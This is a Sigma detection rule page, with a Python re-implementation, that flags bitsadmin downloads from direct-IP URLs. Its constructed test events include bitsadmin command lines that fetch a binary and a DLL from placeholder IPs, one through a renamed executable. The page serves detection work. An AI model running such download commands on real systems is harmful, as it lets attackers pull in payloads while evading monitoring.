Suspicious Download From Direct IP Via Bitsadmin
Detects usage of bitsadmin downloading a file using a URL that contains an IP address.
Sigma rule
```yaml
title: Suspicious Download From Direct IP Via Bitsadmin
id: 99c840f2-2012-46fd-9141-c761987550ef
related:
  - id: 90f138c1-f578-4ac3-8c49-eecfd847c8b7
    type: similar
status: test
description: Detects usage of bitsadmin downloading a file using an URL that contains an IP
references:
  - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
  - https://isc.sans.edu/diary/22264
  - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
  - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
author: Florian Roth (Nextron Systems)
date: 2022-06-28
modified: 2023-02-15
tags:
  - attack.persistence
  - attack.execution
  - attack.stealth
  - attack.t1197
  - attack.s0190
  - attack.t1036.003
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    - Image|endswith: '\bitsadmin.exe'
    - OriginalFileName: 'bitsadmin.exe'
  selection_flags:
    CommandLine|contains:
      - ' /transfer '
      - ' /create '
      - ' /addfile '
  selection_extension:
    CommandLine|contains:
      - '://1'
      - '://2'
      - '://3'
      - '://4'
      - '://5'
      - '://6'
      - '://7'
      - '://8'
      - '://9'
  filter_seven_zip:
    CommandLine|contains: '://7-' # For https://7-zip.org/
  condition: all of selection_* and not 1 of filter_*
falsepositives:
  - Unknown
level: high
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip/info.yml
```
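To show how the rule's three selections and the 7-Zip filter combine under `all of selection_* and not 1 of filter_*`, here is an added Python re-implementation of the detection logic run over a few constructed process_creation events. This is example code written for this page, not part of the Sigma rule or the Sigma project; the events, paths and IP addresses (RFC 5737 documentation ranges) are constructed.

```python
# Constructed process_creation events (not from the original page).
# Field names follow the Sigma process_creation taxonomy used by the rule.
EVENTS = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer job http://203.0.113.5/update.bin C:\Users\Public\update.bin"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer 7z https://7-zip.org/a/7z-x64.exe C:\Temp\7z.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "OriginalFileName": "bitsadmin.exe",
     "CommandLine": "bitsadmin.exe /list /allusers"},
    # Renamed binary: Image no longer matches, but OriginalFileName still does.
    {"Image": r"C:\Tools\renamed.exe",
     "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"renamed.exe /create dl & renamed.exe /addfile dl http://198.51.100.7/x.dll C:\x.dll"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe http://192.0.2.9/file"},
]

# selection_flags and selection_extension values, copied from the rule.
FLAGS = (" /transfer ", " /create ", " /addfile ")
DIGIT_PREFIXES = tuple("://" + d for d in "123456789")


def matches_rule(ev):
    """Evaluate 'all of selection_* and not 1 of filter_*' for one event.

    Sigma string modifiers are case-insensitive by default, so every
    comparison lowercases both sides.
    """
    image = ev.get("Image", "").lower()
    orig_name = ev.get("OriginalFileName", "").lower()
    cmd = ev.get("CommandLine", "").lower()

    # selection_img: a list of maps is OR-ed in Sigma.
    sel_img = image.endswith("\\bitsadmin.exe") or orig_name == "bitsadmin.exe"
    # selection_flags / selection_extension: a list of values is OR-ed.
    sel_flags = any(f in cmd for f in FLAGS)
    sel_ext = any(p in cmd for p in DIGIT_PREFIXES)
    # filter_seven_zip is a prefix match on the host; tune it to the exact
    # host if your environment allows, since any host starting "7-" is excluded.
    filter_seven_zip = "://7-" in cmd

    return sel_img and sel_flags and sel_ext and not filter_seven_zip


def alerts(events):
    """Return the CommandLine of every event the rule would fire on."""
    return [ev["CommandLine"] for ev in events if matches_rule(ev)]
```

Running `alerts(EVENTS)` fires on the direct-IP transfer and on the renamed binary using `/create` and `/addfile`, while the 7-zip.org download, the `/list` invocation and the curl event are not flagged.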
Related rules
- File Download Via Bitsadmin
- File Download Via Bitsadmin To A Suspicious Target Folder
- File With Suspicious Extension Downloaded Via Bitsadmin
- Suspicious Download From File-Sharing Website Via Bitsadmin
- Bitsadmin to Uncommon IP Server Address